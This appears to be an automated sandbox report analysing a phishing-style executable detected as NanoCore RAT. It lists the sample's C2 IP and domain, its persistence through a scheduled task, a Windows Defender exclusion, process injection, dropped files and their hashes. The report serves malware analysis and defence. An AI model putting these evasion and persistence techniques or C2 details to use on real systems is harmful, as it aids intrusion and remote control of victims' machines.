Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, Queries volume information: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Nanocore RAT
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORY

Remote Access Functionality:

Detected Nanocore Rat
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.485095538.0000000003078000.00000004.00000001.sdmp, String found in binary or memory: NanoCore.ClientPluginHost
Yara detected Nanocore RAT
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 1 | Scheduled Task/Job 1 | Process Injection 112 | Masquerading 1 | Input Capture 11 | Query Registry 1 | Remote Services | Input Capture 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Disable or Modify Tools 11 | LSASS Memory | Security Software Discovery 211 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 131 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Remote Access Software 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 112 | NTDS | Virtualization/Sandbox Evasion 131 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 1 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | System Information Discovery 12 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 451085 | Sample: #RFQ ORDER7678432213211.exe | Startdate: 20/07/2021 | Architecture: WINDOWS | Score: 100
Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
  • #RFQ ORDER7678432213211.exe (started)
      dropped: C:\Users\user\AppData\...\XgPYsUfalKn.exe, PE32
      dropped: C:\Users\...\XgPYsUfalKn.exe:Zone.Identifier, ASCII
      dropped: C:\Users\user\AppData\Local\...\tmpFD92.tmp, XML
      dropped: C:\Users\...\#RFQ ORDER7678432213211.exe.log, ASCII
      signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
      started: #RFQ ORDER7678432213211.exe; powershell.exe; powershell.exe; 2 other processes
  • #RFQ ORDER7678432213211.exe (child process)
      DNS/IP: 194.5.98.120, 1604, 49726, 49729 DANILENKODE Netherlands
      dropped: C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO
      signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
  • powershell.exe -> conhost.exe (started)
  • powershell.exe -> conhost.exe (started)
  • 2 other processes -> conhost.exe (started); conhost.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
#RFQ ORDER7678432213211.exe | 13% | ReversingLabs | Win32.Trojan.AgentTesla
#RFQ ORDER7678432213211.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe | 13% | ReversingLabs | Win32.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack | 100% | Avira | TR/NanoCore.fadte
18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
194.5.98.120 | true | Avira URL Cloud: safe | unknown
joseedward5001.ddns.net | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries


Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
194.5.98.120 | unknown | Netherlands | 208476 | DANILENKODE | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 451085
Start date: 20.07.2021
Start time: 08:12:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 44s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: #RFQ ORDER7678432213211.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@15/20@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 139
• Number of non-executed functions: 10
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
08:13:33 | API Interceptor | 708x Sleep call for process: #RFQ ORDER7678432213211.exe modified
08:13:44 | API Interceptor | 116x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
194.5.98.120 | ZwN0lL3CzU.exe | malicious
194.5.98.120 | #RFQ ORDER484475577797.exe | malicious
194.5.98.120 | Purchase_Order_Form_4667ROO3.exe | malicious
194.5.98.120 | IMG-06-05-345678909876543.exe | malicious

Domains

No context

ASN


JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#RFQ ORDER7678432213211.exe.log
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):1406
                      Entropy (8bit):5.341099307467139
                      Encrypted:false
                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                      MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                      SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                      SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                      SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                      Malicious:true
                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):14734
                      Entropy (8bit):4.993014478972177
                      Encrypted:false
                      SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                      MD5:8D5E194411E038C060288366D6766D3D
                      SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                      SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                      SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                      Malicious:false
                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):22376
                      Entropy (8bit):5.6011437476690995
                      Encrypted:false
                      SSDEEP:384:mtCDtPD3nMSoDHgSBKn0LultIO/7Y9g9SJ3xq1BMrmPZ1AV7HtWwu564I+fJzg:b37os4K6ultR79cZu4q1O
                      MD5:59B78DBBB727A10360D42CDD87E4F00B
                      SHA1:93AAFD5EAAB8630C2C0414200107BBEE63CB0461
                      SHA-256:61E26BCF20A5A4285027EB793DFE60E6D960FEC1CF6988187DF2AFF5A8B0AEFF
                      SHA-512:4A9D35BB74092D778AAE430C8A364C678C2264BD694ED401A3C5B69987ACC650EDB60FEA057A1EACE91BE41646ADA192AC3E71B1F0B1655A6574084C7B5A9DC0
                      Malicious:false
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3lbm0dym.0pl.ps1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bowk3z4.alr.ps1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkmlqmz3.kot.psm1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbvx1mrl.nve.psm1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjdu1muo.pll.ps1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwb0ckt4.xfw.psm1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\tmpFD92.tmp
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1644
                      Entropy (8bit):5.191372227906604
                      Encrypted:false
                      SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBFNtn:cbh47TlNQ//rydbz9I3YODOLNdq3P
                      MD5:C4BC1F6430E99ECF81752591B68F61E4
                      SHA1:EB94AEA189CE6B14A93DBCE1D95216E30C645DF4
                      SHA-256:2414C3BBC0BCEACEA13605FDF2BFC30407EDCA1966BC833EBAB1CE2FFF111DE2
                      SHA-512:449D433339BC70094DB9FE8C34845235624EF9AB3D0238FC01C47F19674DF6438DDB4BBBCAE46D8FE367CDC018A36212B6BE38FE273DD7C2DC4A886DCAC13CE3
                      Malicious:true
                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2784
                      Entropy (8bit):7.024371743172393
                      Encrypted:false
                      SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwZ:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
                      MD5:6D2C1BD8306716462108A6A3B4069F75
                      SHA1:F46B24F6060F5F15F05CB3C1CFE633E349FFF316
                      SHA-256:861DDBD599B4033924CDE39DDA488C7F01F36734489859355F7F419AB75B31C0
                      SHA-512:6B231729623A94DC1DED8F6DC21F7B8EC1F109F061A137B037694AAF8013B434654F7893B7B44B4979105A20921BF0C68CA32AA189DFBD85F66AB86A6F64E0ED
                      Malicious:false
                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:Non-ISO extended-ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):8
                      Entropy (8bit):3.0
                      Encrypted:false
                      SSDEEP:3:mu8n:mu8
                      MD5:F95935841A379CDF26C0AE3A4C0FBBE5
                      SHA1:4C11219A155A69DD265A6DBC30B08D75675B88EC
                      SHA-256:6248547EF44A01CC92AEEF2DE7A5B1EDDEA0B48D03B1CB020F8087BE1ED22263
                      SHA-512:2A28206B5BF60C54AE141DB67175A652A5F1C5FA51C421015D9996DDE29C169565792398DBE409D818CB3BB772C0C76E6DBFDC005BF5174935D919B42EFF2E03
                      Malicious:true
                      Preview: .....K.H
                      C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):1084928
                      Entropy (8bit):7.60637440768652
                      Encrypted:false
                      SSDEEP:24576:JU3ej57dEAKrvDBhGw4S3hYA0abY7VZ6Iyvv9JQ0NGNPV:ZALX3x0TrS7V
                      MD5:2F286CD817B368E8A747E8F0D8F28825
                      SHA1:E49BEEC02D942E12B0DAD74D81AB8ED4F02667E2
                      SHA-256:B291D719522053A662CADD70B131668A1D953D4C4DD648E8A5647B689EB6341D
                      SHA-512:3347116D44099808D4BBC050BC45C6B207ADC8C75E2BCFDFC49D3D535328C9DDEEBC0DED194B0C99E2F4EF021E1CFCA221F6F09EEF7FA77322E103671A4009CC
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 13%
                      C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe:Zone.Identifier
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview: [ZoneTransfer]....ZoneId=0
                      C:\Users\user\Documents\20210720\PowerShell_transcript.226546.QECk8fRN.20210720081336.txt
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3595
                      Entropy (8bit):5.398774077157319
                      Encrypted:false
                      SSDEEP:96:BZGLh/NfctqDo1ZP2wZnh/NfctqDo1Zfq04Y0c4Y0c4Y0YbZei:a32xZYEYEY/Ei
                      MD5:74ECE1B3B7B74B56D45D0B249CEA1026
                      SHA1:F3262670D2FF79491054B542E1F1FEEDA11795A8
                      SHA-256:8C4AE9368E03AEB005387E0ED70E0AF86619C35536D349E7982AC8C75700BC54
                      SHA-512:C3F1354E2E164F15242599D81FEEF93865A2BD21251049485E696512A8784CA36D98AB287DAC6FBA6973C78632A44A3DD24D4F19579B77DAB363013CA39F9AA3
                      Malicious:false
